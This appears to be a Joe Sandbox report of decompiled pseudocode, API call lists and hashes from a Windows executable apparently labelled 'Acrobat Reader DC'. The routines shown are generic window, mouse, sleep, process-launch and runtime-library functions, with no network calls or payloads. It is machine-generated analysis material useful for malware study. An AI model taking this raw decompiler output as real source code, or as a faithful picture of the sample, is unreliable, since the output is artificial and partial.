                                  • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                  • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                  • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00440A0D(intOrPtr _a4, intOrPtr _a8, int _a12) {
                                  				struct HWND__*** _t56;
                                  				struct HWND__** _t57;
                                  				struct HWND__** _t63;
                                  				struct HWND__*** _t65;
                                  				struct HWND__** _t66;
                                  				struct HWND__** _t69;
                                  				intOrPtr _t72;
                                  				signed char _t80;
                                  				signed int _t90;
                                  				signed int _t91;
                                  				intOrPtr _t92;
                                  
                                  				_t72 = _a8;
                                  				_t92 = _a4;
                                  				_a8 =  *((intOrPtr*)(_t72 + 4));
                                  				if( *(_t72 + 0x194) == _a12) {
                                  					L14:
                                  					_t90 = 3;
                                  					if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
                                  						L25:
                                  						return SendMessageW( *(_t72 + 0x18c), 0x130c, _a12, 0);
                                  					} else {
                                  						do {
                                  							_t56 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4);
                                  							if( *_t56 != 0) {
                                  								_t57 =  *_t56;
                                  								if(_t57[1] == _a8 && _t57[0x22] != 0xb && (_t57[0x22] & 0x000000ff) ==  *(_t72 + 0x194) && (_t57[0x22] & 0x00000020) == 0) {
                                  									ShowWindow( *_t57, 0);
                                  									ShowWindow( *( *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4))), 4);
                                  									_t63 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t90 * 4));
                                  									if((_t63[0x22] & 0x00000040) != 0 && _t63[0x22] == 0x1a) {
                                  										EnableWindow( *_t63, 1);
                                  									}
                                  								}
                                  							}
                                  							_t90 = _t90 + 1;
                                  						} while (_t90 <=  *((intOrPtr*)(_t92 + 0x84)));
                                  						goto L25;
                                  					}
                                  				}
                                  				_t91 = 3;
                                  				if( *((intOrPtr*)(_t92 + 0x84)) < 3) {
                                  					L13:
                                  					 *(_t72 + 0x194) = _a12;
                                  					goto L14;
                                  				} else {
                                  					goto L2;
                                  				}
                                  				do {
                                  					L2:
                                  					_t65 =  *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4);
                                  					if( *_t65 != 0) {
                                  						_t66 =  *_t65;
                                  						if(_t66[1] == _a8 && _t66[0x22] != 0xb) {
                                  							_t80 = _t66[0x22];
                                  							if((_t80 & 0x000000ff) ==  *(_t72 + 0x194) ||  *((char*)(_t72 + 0x19c)) != 0 && _t80 != 0xff && _t66[0x22] != 0xa) {
                                  								ShowWindow( *_t66, 0);
                                  								_t69 =  *( *( *((intOrPtr*)(_t92 + 0x74)) + _t91 * 4));
                                  								if((_t69[0x22] & 0x00000040) != 0 && _t69[0x22] == 0x1a) {
                                  									EnableWindow( *_t69, 0);
                                  								}
                                  							}
                                  						}
                                  					}
                                  					_t91 = _t91 + 1;
                                  				} while (_t91 <=  *((intOrPtr*)(_t92 + 0x84)));
                                  				goto L13;
                                  			}















                                  APIs
                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Show$Enable$MessageSend
                                  • String ID:
                                  • API String ID: 642888154-0
                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00441FD6(void* __fp0, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				struct tagRECT _v32;
                                  				char _v36;
                                  				long _v40;
                                  				long _v44;
                                  				intOrPtr _v48;
                                  				signed int _t59;
                                  				long _t68;
                                  				long _t72;
                                  				long _t91;
                                  				long _t96;
                                  				signed int _t98;
                                  				void* _t100;
                                  				void* _t101;
                                  
                                  				_t105 = __fp0;
                                  				_t100 = (_t98 & 0xfffffff8) - 0x2c;
                                  				_t72 = _a16;
                                  				E0043137E( *((intOrPtr*)(_a4 + 0x100)),  &_v36, GetForegroundWindow());
                                  				GetWindowRect(GetDesktopWindow(),  &_v32);
                                  				asm("cdq");
                                  				_t96 = (_a8 + _v48 + 1 << 0x10) / _v32.right - 1;
                                  				asm("cdq");
                                  				_t59 = (_a12 + _v44 + 1 << 0x10) / _v32.bottom;
                                  				_t91 = _t59 - 1;
                                  				if(_t72 != 0) {
                                  					if(__eflags <= 0) {
                                  						L6:
                                  						_t72 = 0xa;
                                  						L7:
                                  						GetCursorPos( &(_v32.top));
                                  						asm("cdq");
                                  						_v40 = _v32.top.x * 0xffff / (_v12 - 1) + 1;
                                  						asm("cdq");
                                  						_t68 = _v32.right * 0xffff / (_v8 - 1) + 1;
                                  						__eflags = _t68;
                                  						_v44 = _t68;
                                  						while(1) {
                                  							_t59 = E0043326F(_t96, _t91, _t72, 0x20,  &_v40,  &_v44);
                                  							_t101 = _t100 + 0x18;
                                  							__eflags = _t59;
                                  							if(_t59 == 0) {
                                  								break;
                                  							}
                                  							mouse_event(0x8001, _v40, _v44, 0, 0);
                                  							_push(0xa);
                                  							E004331A2(_t59, _t105);
                                  							_t100 = _t101 + 4;
                                  						}
                                  						L3:
                                  						return _t59;
                                  					}
                                  					__eflags = _t72 - 0x64;
                                  					if(_t72 <= 0x64) {
                                  						goto L7;
                                  					}
                                  					goto L6;
                                  				}
                                  				mouse_event(0x8001, _t96, _t91, _t72, _t72);
                                  				if(_a20 != _t72) {
                                  					_push(0xa);
                                  					_t59 = E004331A2(_t59, __fp0);
                                  				}
                                  				goto L3;
                                  			}



















                                  APIs
                                  • GetForegroundWindow.USER32 ref: 00441FEB
                                    • Part of subcall function 0043137E: GetWindowRect.USER32 ref: 00431399
                                  • GetDesktopWindow.USER32 ref: 00442013
                                  • GetWindowRect.USER32 ref: 0044201A
                                  • mouse_event.USER32 ref: 00442049
                                    • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • GetCursorPos.USER32(?,?,?), ref: 00442078
                                  • mouse_event.USER32 ref: 004420E4
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                  • String ID:
                                  • API String ID: 4137160315-0
                                  • Opcode ID: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction ID: 269498413448c1b0457bf7b9883effbdcf17ebc276120b60b0d95eb2daedcabf
                                  • Opcode Fuzzy Hash: c5ebc6bffcea8891df72ff2766fe98ff5e780c8f2d9f97d85ba0139f445d3039
                                  • Instruction Fuzzy Hash: FA31A372104306AFE710CF54CD85E6BB7E9FF98304F00092DF94597281E6B5EA05CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E00441078(void* __ebx, void* __esi, long _a4, long _a8, signed int _a12) {
                                  				signed int _t18;
                                  				long _t21;
                                  				signed int _t24;
                                  				void* _t32;
                                  				struct HWND__** _t33;
                                  				intOrPtr _t36;
                                  				long _t40;
                                  				void* _t42;
                                  				struct HWND__* _t43;
                                  
                                  				_t42 = __esi;
                                  				_t32 = __ebx;
                                  				_t17 = _a12;
                                  				_t40 = _a4;
                                  				if(_a12 == 0) {
                                  					_t18 =  *0x4a869c; // 0xffffffff
                                  				} else {
                                  					_t18 = E00430C09(_t17, 0x4a8630, _t17);
                                  					 *0x4a869c = _t18;
                                  				}
                                  				if(_t18 != 0xffffffff) {
                                  					_t36 =  *0x4a8690; // 0x0
                                  					_push(_t32);
                                  					_t33 =  *( *(_t36 + _t18 * 4));
                                  					_push(_t42);
                                  					_t43 =  *_t33;
                                  					_a12 = 0 | (GetWindowLongW(_t43, 0xfffffff0) & 0x00c00000) == 0x00c00000;
                                  					if(_t40 == 0xffffffff || SetWindowLongW(_t43, 0xfffffff0, _t40) != 0) {
                                  						_t21 = _a8;
                                  						if(_t21 == 0xffffffff || SetWindowLongW(_t43, 0xffffffec, _t21) != 0) {
                                  							if(_t33[0xe] != 0) {
                                  								_t24 = 0 | (_t40 & 0x00c00000) == 0x00c00000;
                                  								if(_a12 != _t24) {
                                  									_push(4);
                                  									if(_t24 == 0) {
                                  										_t33[0x12] = _t33[0x12] - GetSystemMetrics();
                                  									} else {
                                  										_t33[0x12] = _t33[0x12] + GetSystemMetrics();
                                  									}
                                  								}
                                  								SetWindowPos(_t43, 0, 0, 0, 0, 0, 0x47);
                                  							}
                                  							return 1;
                                  						} else {
                                  							goto L6;
                                  						}
                                  					} else {
                                  						L6:
                                  						return 0;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}













                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044389A(void* __ecx, void* __eflags, struct HDC__* _a4, intOrPtr _a8, signed int _a12) {
                                  				long _v12;
                                  				char _v20;
                                  				void* __edi;
                                  				void* _t23;
                                  				int _t29;
                                  				long _t31;
                                  				void* _t33;
                                  				signed int _t34;
                                  				void* _t35;
                                  				char _t39;
                                  				WCHAR* _t40;
                                  				struct tagSIZE* _t41;
                                  				void* _t42;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  
                                  				_t46 = __eflags;
                                  				_t35 = __ecx;
                                  				_t41 = _a12;
                                  				E0043652F(_t46,  &_v20, E00410160(_a8, __eflags));
                                  				_t39 = _v20;
                                  				_t34 = 0;
                                  				_t41->cy = 0;
                                  				_t41->cx = 0;
                                  				_v12 = 0;
                                  				_a12 = 1;
                                  				_t23 = E004111C1(_t39);
                                  				_t43 = _t42 + 4;
                                  				if(_t23 != 0) {
                                  					do {
                                  						if( *((short*)(_t39 + _t34 * 2)) == 0xa) {
                                  							_a12 = _a12 + 1;
                                  						}
                                  						_t34 = _t34 + 1;
                                  						_t33 = E004111C1(_t39);
                                  						_t43 = _t43 + 4;
                                  						_t50 = _t34 - _t33;
                                  					} while (_t34 < _t33);
                                  				}
                                  				_t40 = E00413EB8(_t35, _t50, _t39, L"\r\n");
                                  				_t44 = _t43 + 8;
                                  				while(_t40 != 0) {
                                  					_t29 = E004111C1(_t40);
                                  					_t36 = _a4;
                                  					_t45 = _t44 + 4;
                                  					GetTextExtentPoint32W(_a4, _t40, _t29, _t41);
                                  					_t31 = _t41->cx;
                                  					_t52 = _t31 - _v12;
                                  					if(_t31 > _v12) {
                                  						_v12 = _t31;
                                  					}
                                  					_t40 = E00413EB8(_t36, _t52, 0, L"\r\n");
                                  					_t44 = _t45 + 8;
                                  				}
                                  				_t41->cy = _t41->cy * _a12;
                                  				_t41->cx = _v12;
                                  				return E00436508( &_v20);
                                  			}




















                                  APIs
                                    • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                    • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                  • _wcslen.LIBCMT ref: 004438CD
                                  • _wcslen.LIBCMT ref: 004438E6
                                  • _wcstok.LIBCMT ref: 004438F8
                                  • _wcslen.LIBCMT ref: 0044390C
                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                  • _wcstok.LIBCMT ref: 00443931
                                  Similarity
                                  • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                  • String ID:
                                  • API String ID: 3632110297-0
                                  • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                  • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                  • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 37%
                                  			E00436E94(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, intOrPtr _a20, void* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                                  				int _v8;
                                  				signed char _t29;
                                  				intOrPtr _t31;
                                  				intOrPtr _t32;
                                  				int _t36;
                                  				signed int _t40;
                                  				void* _t53;
                                  				signed int _t56;
                                  
                                  				_t29 = _a16;
                                  				_t56 = _a24;
                                  				_t53 = 0;
                                  				_a16 = 0;
                                  				if((_t29 & 0x00000001) == 0) {
                                  					if((_t29 & 0x00000002) != 0) {
                                  						_t53 = 2;
                                  					}
                                  				} else {
                                  					_t53 = 1;
                                  				}
                                  				_t40 = 0;
                                  				if((_t29 & 0x00000004) == 0) {
                                  					L6:
                                  					_t31 = _a12;
                                  					__imp__CreateProcessWithLogonW(_a4, _a8, _t31, _t53, 0, _a20, _t56 | 0x00000400, _a16, _a28, _a32, _a36);
                                  					_t40 = _t40 & 0xffffff00 | _t31 != 0x00000000;
                                  					goto L7;
                                  				} else {
                                  					_a24 = 0;
                                  					_t36 = OpenProcessToken(GetCurrentProcess(), 0xa,  &_a24);
                                  					__imp__CreateEnvironmentBlock( &_a16, _a24, 1);
                                  					_v8 = _t36;
                                  					CloseHandle(_a24);
                                  					if(_v8 == 0) {
                                  						L7:
                                  						_t32 = _a16;
                                  						if(_t32 != 0) {
                                  							__imp__DestroyEnvironmentBlock(_t32);
                                  						}
                                  						return _t40;
                                  					}
                                  					goto L6;
                                  				}
                                  			}












                                  APIs
                                  • GetCurrentProcess.KERNEL32(0000000A,?), ref: 00436EC9
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00436ED0
                                  • CreateEnvironmentBlock.USERENV(?,?,00000001), ref: 00436EE0
                                  • CloseHandle.KERNEL32(?), ref: 00436EED
                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 00436F23
                                  • DestroyEnvironmentBlock.USERENV(?), ref: 00436F36
                                  Similarity
                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                  • String ID:
                                  • API String ID: 1413079979-0
                                  • Opcode ID: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction ID: dd31e3d5ef53dadf09d6f4902918c4fef8fb0ebcc20249036383472598af8dfc
                                  • Opcode Fuzzy Hash: c9cc6947404163de0e4cba86d071e92e41844a234d0bab68a120be017310f46c
                                  • Instruction Fuzzy Hash: 10214C7620020AABDB14CF69DD59EEB37ADEB8D310F15851AFD05A3250C775EC12CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E004331A2(int __eax, signed long long __fp0, long _a4, signed short _a6) {
                                  				signed int _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				union _LARGE_INTEGER _v20;
                                  				union _LARGE_INTEGER _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				union _LARGE_INTEGER _v44;
                                  				signed int _t20;
                                  				long _t26;
                                  				long _t27;
                                  				signed long long _t28;
                                  
                                  				_t28 = __fp0;
                                  				_t13 = __eax;
                                  				_t26 = _a4;
                                  				_t27 = _t26;
                                  				if(_t27 < 0) {
                                  					return __eax;
                                  				} else {
                                  					if(_t27 != 0) {
                                  						if(_t26 >= 0xf) {
                                  							L8:
                                  							Sleep(_t26);
                                  							return _t13;
                                  						}
                                  						_t13 = QueryPerformanceCounter( &_v28);
                                  						if(_t13 == 0) {
                                  							goto L8;
                                  						}
                                  						QueryPerformanceFrequency( &_v44);
                                  						do {
                                  							Sleep(0);
                                  							QueryPerformanceCounter( &_v20);
                                  							asm("fnstcw word [ebp+0xa]");
                                  							asm("sbb ecx, [ebp-0x14]");
                                  							_v36 = _v20.LowPart - _v28.LowPart;
                                  							_v32 = _v16;
                                  							asm("fild qword [ebp-0x20]");
                                  							asm("fild qword [ebp-0x28]");
                                  							_t20 = _a6 & 0x0000ffff | 0x00000c00;
                                  							_v8 = _t20;
                                  							asm("fdivp st1, st0");
                                  							_t28 = _t28 *  *0x48cd40;
                                  							asm("fldcw word [ebp-0x4]");
                                  							asm("fistp qword [ebp-0x8]");
                                  							asm("fldcw word [ebp+0xa]");
                                  						} while (_v12 < _t26);
                                  						return _t20;
                                  					} else {
                                  						Sleep(0);
                                  						return _t13;
                                  					}
                                  				}
                                  			}
















                                  APIs
                                  • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                  • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                  Similarity
                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                  • String ID:
                                  • API String ID: 2833360925-0
                                  • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                  • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                  • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00447275(struct HDC__* _a4, int _a8, int _a12, signed char _a16) {
                                  				void* _t10;
                                  				int _t19;
                                  				int _t22;
                                  				struct HDC__* _t24;
                                  
                                  				_t19 = _a8;
                                  				_t24 = _a4;
                                  				_t22 = _a12;
                                  				if((_a16 & 0x00000001) != 0) {
                                  					E0044719B(_t24, 0, 0xffffffff, 0, 1);
                                  					MoveToEx(_t24, _t19 - 2, _t22, 0);
                                  					LineTo(_t24, _t19 + 3, _t22);
                                  					MoveToEx(_t24, _t19, _t22 - 2, 0);
                                  					LineTo(_t24, _t19, _t22 + 3);
                                  					if( *0x4a86ec != 0) {
                                  						EndPath(_t24);
                                  						 *0x4a86ec = 0;
                                  					}
                                  					return StrokePath(_t24);
                                  				}
                                  				return _t10;
                                  			}








                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                  • LineTo.GDI32(?,?,?), ref: 004472AC
                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                  • LineTo.GDI32(?,?,?), ref: 004472C6
                                  • EndPath.GDI32(?), ref: 004472D6
                                  • StrokePath.GDI32(?), ref: 004472E4
                                  Similarity
                                  • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                  • String ID:
                                  • API String ID: 372113273-0
                                  • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00417082(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                  				signed int _t15;
                                  				LONG* _t21;
                                  				void* _t29;
                                  				void* _t31;
                                  				LONG* _t33;
                                  				void* _t34;
                                  				void* _t35;
                                  
                                  				_t35 = __eflags;
                                  				_t29 = __edx;
                                  				_t25 = __ebx;
                                  				_push(0xc);
                                  				_push(0x48d0e8);
                                  				E00416C70(__ebx, __edi, __esi);
                                  				_t31 = E00417A69(__ebx, _t35);
                                  				_t15 =  *0x490800; // 0xfffffffe
                                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                  					E004182CB(_t25, _t31, 0xd);
                                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                  					_t33 =  *(_t31 + 0x68);
                                  					 *(_t34 - 0x1c) = _t33;
                                  					__eflags = _t33 -  *0x490708; // 0xa52c70
                                  					if(__eflags != 0) {
                                  						__eflags = _t33;
                                  						if(__eflags != 0) {
                                  							__eflags = InterlockedDecrement(_t33);
                                  							if(__eflags == 0) {
                                  								__eflags = _t33 - 0x4902e0;
                                  								if(__eflags != 0) {
                                  									E00413748(_t33);
                                  								}
                                  							}
                                  						}
                                  						_t21 =  *0x490708; // 0xa52c70
                                  						 *(_t31 + 0x68) = _t21;
                                  						_t33 =  *0x490708; // 0xa52c70
                                  						 *(_t34 - 0x1c) = _t33;
                                  						InterlockedIncrement(_t33);
                                  					}
                                  					 *(_t34 - 4) = 0xfffffffe;
                                  					E0041711D();
                                  				} else {
                                  					_t33 =  *(_t31 + 0x68);
                                  				}
                                  				_t38 = _t33;
                                  				if(_t33 == 0) {
                                  					_push(0x20);
                                  					E00411924(_t29, _t38);
                                  				}
                                  				return E00416CB5(_t33);
                                  			}











                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(00A52C70), ref: 00417106
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00410AB0(intOrPtr* __esi) {
                                  				int _t20;
                                  
                                  				 *__esi = 5;
                                  				 *((intOrPtr*)(__esi + 4)) = 5;
                                  				 *((short*)(__esi + 8)) = 1;
                                  				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                  				 *((intOrPtr*)(__esi + 0x14)) = 0;
                                  				 *((short*)(__esi + 0x18)) = 0;
                                  				 *((intOrPtr*)(__esi + 0x1a)) = 0;
                                  				 *((short*)(__esi + 0x1e)) = 0;
                                  				 *((intOrPtr*)(__esi + 0xc)) = 4;
                                  				 *((char*)(__esi + 0x29)) = MapVirtualKeyW(0x5b, 0);
                                  				 *((char*)(__esi + 0x26)) = MapVirtualKeyW(0x10, 0);
                                  				 *((char*)(__esi + 0x27)) = MapVirtualKeyW(0xa0, 0);
                                  				 *((char*)(__esi + 0x28)) = MapVirtualKeyW(0xa1, 0);
                                  				 *((char*)(__esi + 0x24)) = MapVirtualKeyW(0x11, 0);
                                  				_t20 = MapVirtualKeyW(0x12, 0);
                                  				 *(__esi + 0x25) = _t20;
                                  				return _t20;
                                  			}





                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
